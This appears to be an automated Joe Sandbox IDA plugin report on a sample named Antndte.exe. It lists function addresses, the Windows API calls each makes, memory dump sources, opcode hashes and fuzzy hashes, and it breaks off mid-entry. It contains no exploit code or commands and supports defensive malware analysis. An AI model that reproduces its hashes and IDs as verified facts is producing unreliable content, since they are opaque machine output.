                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateErrorFileLast
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1214770103-0
                                                                                                                                • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                                                                                • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
                                                                                                                                • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                                                                                • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsm118D.tmp,00000000,00000011,00000002), ref: 00402551
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3356406503-0
                                                                                                                                • Opcode ID: 8261bc8437de9397d7efa493d3c14ec671ad5d0a4e3b3d70237c1a055cd98deb
                                                                                                                                • Instruction ID: 5dbb434a41a715d7517c89e318d331cd35bfdf9d93bbd69694c25902619df99f
                                                                                                                                • Opcode Fuzzy Hash: 8261bc8437de9397d7efa493d3c14ec671ad5d0a4e3b3d70237c1a055cd98deb
                                                                                                                                • Instruction Fuzzy Hash: DC11A331910209EFEF24DFA4CA585BEB6B4EF04354F21843FE046A72C0D7B84A45DB59
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                • Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                                                                                • Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
                                                                                                                                • Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                                                                                • Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00402388 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseDeleteValue
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2831762973-0
                                                                                                                                • Opcode ID: fac0fa569ca165b0481b34043c061d8b849461066cef3e30bb278c6306723ed1
                                                                                                                                • Instruction ID: a65daa511511277569afb244ca8fe97b80a25767db049908362439423f8cf232
                                                                                                                                • Opcode Fuzzy Hash: fac0fa569ca165b0481b34043c061d8b849461066cef3e30bb278c6306723ed1
                                                                                                                                • Instruction Fuzzy Hash: E5F09632A041149BE711BBA49B4EABEB2A99B44354F16043FFA02F71C1DEFC4D41966D
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • ShowWindow.USER32(000103D8,?), ref: 00401587
                                                                                                                                • ShowWindow.USER32(000103D2), ref: 0040159C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ShowWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1268545403-0
                                                                                                                                • Opcode ID: 127fcca6f89a8604d6b4e5a3b07e2e150d46683bc6f97280cfd7514b8c0c2a53
                                                                                                                                • Instruction ID: 07726e94f459f5b79439a183944d215d14e5e7c392dcdebcc51584dee33f67e3
                                                                                                                                • Opcode Fuzzy Hash: 127fcca6f89a8604d6b4e5a3b07e2e150d46683bc6f97280cfd7514b8c0c2a53
                                                                                                                                • Instruction Fuzzy Hash: D1E086377041049FCB15DFA4ED808AE77A6EB44321318047FE502F3690C675AD40CF68
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0040665C Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                                                                                                  • Part of subcall function 004065EC: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                                                                                                  • Part of subcall function 004065EC: wsprintfW.USER32 ref: 0040663E
                                                                                                                                  • Part of subcall function 004065EC: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406652
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2547128583-0
                                                                                                                                • Opcode ID: 2c450699f5e5c6ed5e41876474a170b73f17b01a65d70064c3ee9ca103cb2d45
                                                                                                                                • Instruction ID: f71ddd0ba98f8a8be4c3f380e987b43417b0e7e7cad23f5b62dfe7414387192f
                                                                                                                                • Opcode Fuzzy Hash: 2c450699f5e5c6ed5e41876474a170b73f17b01a65d70064c3ee9ca103cb2d45
                                                                                                                                • Instruction Fuzzy Hash: 18E026321002016AC7008A305E4083763AC9B85340303883FFD46F2081DB39DC31A6AD
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00405D74 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\Antndte.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 415043291-0
                                                                                                                                • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                                                                • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00405832 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403366,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76D63420,004035BF,?,00000006,00000008,0000000A), ref: 00405838
                                                                                                                                • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405846
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1375471231-0
                                                                                                                                • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                • Instruction ID: 034de6f099216337e7681325378c15a49c0ca39433587e883605b7c80b1fabea
                                                                                                                                • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                • Instruction Fuzzy Hash: C8C08C312155019AC7002F219F08B0B3A50AB20340F018439A946E00E0DA308424DD2D
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileMove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3562171763-0
                                                                                                                                • Opcode ID: 00950383e2418b758ba5d5ef96d8c906d56e3cb6ea615abdf22e42107666f064
                                                                                                                                • Instruction ID: a1293fda71315ca4f457bf12d72103a8cc789f689a624f6d3393c8ddcf995e9b
                                                                                                                                • Opcode Fuzzy Hash: 00950383e2418b758ba5d5ef96d8c906d56e3cb6ea615abdf22e42107666f064
                                                                                                                                • Instruction Fuzzy Hash: 06F0B431608114A7DB20B7B54F0DE9F61A48F92378F25073FB011B21D1EABC8911956F
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00402306 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: PrivateProfileStringWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 390214022-0
                                                                                                                                • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                                                                                • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                                                                                                • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                                                                                • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0040611D Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406146
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Create
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                • Instruction ID: 190238b8cd19dd4efab6c9cc8903e135eae53195524c7f3a74b1c4143961a507
                                                                                                                                • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                • Instruction Fuzzy Hash: A1E0E6B2010109BEDF095F50DD0AD7B371DEB04704F01452EFA57D5091E6B5A9309679
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: PathSearch
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2203818243-0
                                                                                                                                • Opcode ID: 87fe3b61629f5e0ebd9fc8bdc6ab881a16aedefde4f24a351ebdfdeb992b7138
                                                                                                                                • Instruction ID: c536573bc3e43d5b3a7e85c7c9e9d28b189a23ca24d66c16325d62ee7f8c4f5c
                                                                                                                                • Opcode Fuzzy Hash: 87fe3b61629f5e0ebd9fc8bdc6ab881a16aedefde4f24a351ebdfdeb992b7138
                                                                                                                                • Instruction Fuzzy Hash: 42E04FB2704204AAE710DBA4DE49AAA77A8DF40368B20853AB211E61C1E6B49941976D
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00405E26 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032DE,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E3A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
